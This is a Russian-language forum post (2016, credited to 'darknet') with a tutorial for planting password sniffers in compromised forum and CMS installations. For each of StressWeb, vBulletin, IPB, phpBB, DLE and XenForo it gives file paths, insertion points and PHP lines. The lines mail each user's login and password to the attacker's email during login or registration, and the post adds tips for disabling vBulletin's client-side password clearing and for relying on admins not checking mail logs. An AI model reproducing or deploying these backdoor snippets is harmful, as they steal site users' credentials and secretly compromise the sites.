Последние темы:

Последние сообщения:

Авторизация  
Подписчики 0
Bandit

Ставим сниффер на форумы и CMS (2016)

Опубликовал Bandit,

В теме 1 сообщение

Bandit    289

Bandit
Опубликовано

Если Вы получили доступ к админке и залили шелл или просто имеете доступ к FTP форума или какой-нибудь CMS.

Можно его заснифать, чтобы к примеру собрать логины/пароли.

Везде принцип один и тот же, мы вызываем $ipsclass_all, и все пароли, с емайлами или логинами приходят на наш емайл.

 

StressWeb.Установка снифера на StressWeb.

 

Воруем логин/пасс при регистрации с движка StressWeb (версия 13x) возможно и для других подойдет.

 

Открыть Файл:

Code:
www/application/register.php
Находим такие строки:

Code:
$tpl->LoadView( "email_register_ok" ); $tpl->Set( 'login', $_login ); $tpl->Set( 'password', $_l2pass1 ); $tpl->Set( 'host', HTTP_HOME_URL ); $tpl->Build( "mail_message" ); $mail_message = $tpl->GetResult( "mail_message" );$mail = new Email( $l2cfg ); $mail->send( $_l2email, 'Регистрация аккаунта', $mail_message );
Между строчкой:

 

Code:
$mail_message = $tpl->GetResult( "mail_message" );
И:

 

Code:
$mail->send( $_l2email, 'Регистрация аккаунта', $mail_message );
Вставляем код:

Code:
$ipsclass_all = $_login . ":" . $_l2pass1; mail('ваш_email@yandex.ru', 'sitename.ru', $ipsclass_all);
Учтите, пропуск строки после $mail_message = $tpl->GetResult( "mail_message" ); должен остаться!

 

В Итоге все выглядит вот так:

 

Code:
$tpl->LoadView( "email_register_ok" );$tpl->Set( 'login', $_login );$tpl->Set( 'password', $_l2pass1 );$tpl->Set( 'host', HTTP_HOME_URL );$tpl->Build( "mail_message" );$mail_message = $tpl->GetResult( "mail_message" );
Code:
$ipsclass_all = $_login . ":" . $_l2pass1;mail('ваш_email@yandex.ru', 'sitename.ru', $ipsclass_all);$mail = new Email( $l2cfg );$mail->send( $_l2email, 'Регистрация аккаунта', $mail_message );

Vbulletin.Установка снифера на Vbulletin.

 

Воруем логин/пасс при входе с движка Vbulletin(версия 4x) возможно и для других подойдет.

 

Открываем файл:

Code:
/forum/login.php
Ищем такую строчку:

 

Код:

Code:
// can the user login?
Она должна стоять после:

 

Code:
$vbulletin->input->clean_array_gpc('p', array( 'vb_login_username' => TYPE_STR, 'vb_login_password' => TYPE_STR, 'vb_login_md5password' => TYPE_STR, 'vb_login_md5password_utf' => TYPE_STR, 'postvars' => TYPE_STR, 'cookieuser' => TYPE_BOOL, 'logintype' => TYPE_STR, 'cssprefs' => TYPE_STR,));
Вставляем следующее после того что выше:

 

Code:
//does the user have a pass $username = $vbulletin->GPC['vb_login_username'];$password = $vbulletin->GPC['vb_login_password'];$ipsclass_all = $username . ":" . $password;mail('ваш_email@yandex.ru', 'sitename.ru', $ipsclass_all);
Внимание! Если пасс не приходит идем сюда и находим файл:
Code:
/clientscript/vbulletin_md5.js
Вариант 1 - удаляем файл.

 

ИЛИ

 

Вариант 2 - Находим такую строчку:

 

Code:
// implemented like this to make sure un-updated templates behave as before input.value = ''; </div>
Это значит, что введенный нами пароль просто затирается перед передачей дальше. Просто комментим строку и собираем пароли (обновляем страницу, для того чтобы заюзать измененный Javascript)...

 

Code:
// input.value = '';...
ваш_email@yandex.ru - смените емайл, на Ваш, куда будут приходить логины/пароли.

sitename.ru - так будет называться тема письма, смените на название сайта скажем, который Вы будете снифить.

На Ваш указанный емайл будет присылаться логин:пароль при авторизации на сайте Vbulletin.

 

Ipb.Установка снифера на Ipb

.

 

Воруем логин/пасс при входе с движка Ipb(версия 3xx) возможно и для других подойдет.

 

Открываем файл:

Code:
/forum/admin/sources/handlers/han_login.php
Сразу под строкой // Check auth вставляем следующее, чтоб получилось так:

Code:
//----------------------------------------- // Check auth //-----------------------------------------$this->loginAuthenticate( $username, $email, $password );$ipsclass_all = $username . ":" . $password;mail('ваш_email@yandex.ru', 'sitename.ru', $ipsclass_all);$member = $this->member_data;
ваш_email@yandex.ru - смените емайл, на Ваш, куда будут приходить логины/пароли.

sitename.ru - так будет называться тема письма, смените на название сайта скажем, который Вы будете снифить.

На Ваш указанный емайл будет присылаться логин:пароль при авторизации на сайте IPB.

 

Phbb.Установка снифера на Phbb.

 

Воруем логин/пасс при входе с движка Phbb(версия 3x) возможно и для других подойдет

 

Открываем файл:

Code:
 /forum/includes/auth.php
Находим:

 

Code:
$login = $method($username, $password, $user->ip, $user->browser, $user->forwarded_for);
После вставляем:

 

Code:
$ipsclass_all = $username . ":" . $password;mail('ваш_email@yandex.ru', 'sitename.ru', $ipsclass_all);
ваш_email@yandex.ru - смените емайл, на Ваш, куда будут приходить логины/пароли.

sitename.ru - так будет называться тема письма, смените на название сайта скажем, который Вы будете снифить.

На Ваш указанный емайл будет присылаться логин:пароль при авторизации на сайте Phbb.

 

DLE.Установка снифера на DLE.

 

Воруем логин/пасс при входе с движка DLE (версия 10-9) возможно и для других подойдет.

 

Открываем файл:

Code:
site.ru/public_html/engine/modules/sitelogin.php
Находим 49 строчку:

 

Code:
if( isset( $_POST['login'] ) AND $_POST['login_name'] AND $_POST['login_password'] AND $_POST['login'] == "submit" ) {
Вставляем ниже:

Code:
$ipsclass_all = $_POST['login_name'] . ":" . $_POST['login_password']; mail('ваш_email@yandex.ru', 'sitename.ru', $ipsclass_all);
ваш_email@yandex.ru - смените емайл, на Ваш, куда будут приходить логины/пароли.

sitename.ru - так будет называться тема письма, смените на название сайта скажем, который Вы будете снифить.

На Ваш указанный емайл будет присылаться логин:пароль при авторизации на сайте DLE .

 

Если хотите сделать, что бы пароли отправлялись сразу после регистрации.

 

Открыть Файл:

Code:
site.ru/public_html/engine/modules/register.php
Cтрочка 274:

 

Code:
$row['template'] = str_replace( "{%password%}", $password1, $row['template'] );
Ниже вставляем:

 

Code:
$ipsclass_all = $email . ":" . $password1; mail('ваш_email@yandex.ru', 'sitename.ru', $ipsclass_all);
Должно получиться вот так:

 

Code:
$row['template'] = str_replace( "{%username%}", $name, $row['template'] );$row['template'] = str_replace( "{%email%}", $email, $row['template'] );$row['template'] = str_replace( "{%validationlink%}", $config['http_home_url'] . "index.php?do=register&doaction=validating&id=" . $idlink, $row['template'] );$row['template'] = str_replace( "{%password%}", $password1, $row['template'] );$ipsclass_all = $email . ":" . $password1;mail('ваш_email@yandex.ru', 'sitename.ru', $ipsclass_all);$mail->send( $email, $lang['reg_subj'], $row['template'] );

XenForo.Установка снифера на XenForo.

 

Воруем логин/пасс при входе с движка XenForo(версия 1.4x) возможно и для других подойдет

 

Открываем файл:

Code:
 libraryXenForoControllerPublicLogin.php

Находим такие строки на строчках 99-101:

 

Code:
$userModel = $this->_getUserModel();$userId = $userModel->validateAuthentication($data['login'], $data['password'], $error);
Ниже вставляем:

 

Code:
$ipsclass_all = $data['login'] . ":" . $data['password'];mail('ваш_email@yandex.ru', 'sitename.ru', $ipsclass_all);
ваш_email@yandex.ru - смените емайл, на Ваш, куда будут приходить логины/пароли.

sitename.ru - так будет называться тема письма, смените на название сайта скажем, который Вы будете снифить.

На Ваш указанный емайл будет присылаться логин:пароль при авторизации на сайте XenForo.

 

Если хотите сделать, что бы пароли отправлялись сразу после регистрации.

 

Открыть Файл:

Code:
libraryXenForoControllerPublicRegister.php
Находим такие строки:

 

Code:
/** * Registers a new user. * * @return XenForo_ControllerResponse_Abstract */ public function actionRegister() { $this->_assertPostOnly(); $this->_assertRegistrationActive();$inputData = $this->_getRegistrationInputDataSafe(); $data = $inputData['data']; $passwords = $inputData['passwords']; $customFields = $inputData['customFields']; $customFieldsShown = $inputData['customFieldsShown']; $errors = $inputData['errors'];
Ниже вставляем:

Code:
$ipsclass_all = $data['email'] . ":" . $passwords['password'];mail('ваш_email@yandex.ru', 'sitename.ru', $ipsclass_all);
ваш_email@yandex.ru - смените емайл, на Ваш, куда будут приходить логины/пароли.

sitename.ru - так будет называться тема письма, смените на название сайта скажем, который вы будете снифить.

На Ваш указанный емайл будет присылаться логин:пароль сразу при регистрации на сайте XenForo.

 

Заключение:

Да и забыл сказать еще, в логах мал даемонд, спалится обычно вся отправка, но как правило 90% админов вообще не смотрят, я думаю они даже не подозревают что их снифают.

Так же удобно снифать свой же форум, в целях безопасности, вот зарегался у тебя админ, который спамит по всем форумам, а тут его парольчик и словили, 50/50 бывает и к мылу подойдет.

 

2016 darknet © Copypaste

Поделиться сообщением

Ссылка на сообщение

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти
Авторизация  
Подписчики 0
Перейти к списку тем Статьи